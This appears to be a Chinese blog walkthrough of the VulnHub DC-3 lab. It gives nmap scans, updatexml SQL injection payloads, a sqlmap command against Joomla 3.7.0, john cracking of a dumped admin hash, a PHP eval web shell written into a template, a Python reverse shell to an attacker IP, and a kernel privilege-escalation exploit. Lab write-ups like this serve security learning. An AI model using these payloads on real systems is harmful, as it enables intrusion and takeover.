hh

小白

0%

vulnhub DC-3

发表于 分类于

vulnhub DC-3

扫描

1
2
3
nmap -sP 192.168.3.0/24
nmap -sC -sV -p- 192.168.3.176  
80端口
  • sql注入 updatexml报错注入
1
2
3
1' and updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1)#
1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='joolmadb' and table_name='associations'),0x7e),1)

搜索漏洞&& 使用john爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
searchsploit joomla 3.7.0
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt

sqlmap.py -u "http://192.168.81.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

--keep-alive
--null-connection
--threads=3

| name   | id  | password                                                     | usernamae |
+--------+-----+--------------------------------------------------------------+-----------+
| admin  | 629 | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

nano s
admin:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

john s    #  爆破密码
snoopy           (admin) 
1
2
3
4
5
6
https://github.com/HoangKien1020/CVE-2021-23132

在template  /error.php 写入eval($_POST['s']);phpinfo();
http://192.168.81.135/administrator/index.php?option=com_templates&view=template&id=503&file=L2Vycm9yLnBocA  

http://192.168.81.135/templates/beez3/error.php   #  连接密码 s

提权&&交互式shell

1
2
3
4
5
lsb_release -a
uname -a
cat /proc/version	# 内核信息
cat /etc/*-release	# 发布信息
cat /etc/issue		# 发布信息
1
2
3
4
searchsploit ubuntu 16.04 4.4
cat /usr/share/exploitdb/exploits/linux/local/39772.txt

tar -xvf exploit.tar
  • 这里需要交互式的sehll才能提权成功,蚁剑并不是交互式的shell
1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.81.129",8002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

将命令保存到文件里,上传蚁剑,然后执行,得到交互式shell

用39772.txt提权成功

1
2
3
4
tar -xvf exploit.tar

./compile.sh
./doubleput

内容

  • searchsploit 使用
  • 从蚁剑的shell转到交互式shell
  • 内核提权